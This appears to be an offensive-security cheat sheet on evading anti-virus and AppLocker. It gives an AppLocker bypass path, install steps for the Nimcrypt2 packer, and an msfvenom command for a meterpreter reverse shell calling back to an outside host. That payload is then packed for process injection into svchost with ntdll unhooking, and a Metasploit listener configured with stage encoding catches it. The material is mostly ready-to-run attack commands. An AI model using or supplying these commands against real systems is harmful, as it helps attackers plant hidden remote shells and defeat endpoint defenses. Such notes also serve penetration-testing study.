Anti-Virus Evasion
Applocker
AppLocker is an application whitelisting technology introduced with Windows 7.
It allows restricting which programs users can execute based on the programs path, publisher and hash.
If AppLocker is configured with default AppLocker rules, we can bypass it by placing our executable in the following directory:
C:\Windows\System32\spool\drivers\color
This is whitelisted by default.
Nimcrypt2
Help Menu
Usage:
nimcrypt -f file_to_load -t csharp/raw/pe [-o <output>] [-p <process>] [-n] [-u] [-s] [-e] [-g] [-l] [-v] [--no-ppid-spoof]
nimcrypt (-h | --help)
Options:
-h --help Show this screen.
--version Show version.
-f --file filename File to load
-t --type filetype Type of file (csharp, raw, or pe)
-p --process process Name of process for shellcode injection
-o --output filename Filename for compiled exe
-u --unhook Unhook ntdll.dll
-v --verbose Enable verbose messages during execution
-e --encrypt-strings Encrypt strings using the strenc module
-g --get-syscallstub Use GetSyscallStub instead of NimlineWhispers2
-l --llvm-obfuscator Use Obfuscator-LLVM to compile binary
-n --no-randomization Disable syscall name randomization
-s --no-sandbox Disable sandbox checks
--no-ppid-spoof Disable PPID Spoofing
Installation
git clone https://github.com/icyguider/Nimcrypt2.git
sudo apt install gcc mingw-w64 xz-utils git
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
echo "export PATH=$HOME/.nimble/bin:$PATH" >> ~/.bashrc
export PATH=$HOME/.nimble/bin:$PATH
nimble install winim nimcrypto docopt ptr_math strenc
cd /opt/Nimcrypt2
nim c -d=release --cc:gcc --embedsrc=on --hints=on --app=console --cpu=amd64 --out=nimcrypt nimcrypt.nim
Nimcrypt2 is a fantastic option for obfuscating your binaries, works with sliver, msf, and more
generate your payload
Metasploit with Nimcrypt
//Payload Generation
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.15.45 LPORT=443 --encoder x86/shikata_ga_nai -i 3 -f exe -o start.exe
Now encrypt it with nimcrypt2
./nimcrypt -f start.exe -t pe -o security.exe -p svchost -e -u
Metasploit Listener Obsfucation
msfconsole -q
use exploit/multi/handler
set LHOST 10.10.15.45
set LPORT 443
set payload windows/x64/meterpreter/reverse_tcp
set EXITFUNC thread
set autoloadstdapi false
set autosysteminfo false
set enablestageencoding true
set stageencoder x64/xor_dynamic
run -j
Nimcrypt and Shellcode / PE
Generate your shellcode blob
Select a process to inject into, the default process is
explorer.exe
If the process is not started, nimcrypt will spawn it and then inject into it
Shellcode
./nimcrypt2 -f shellcode.bon -t raw -o filename.exe -p process-name
PE
./nimcrypt2 -f shellcode.exe -t pe -o filename.exe
Last updated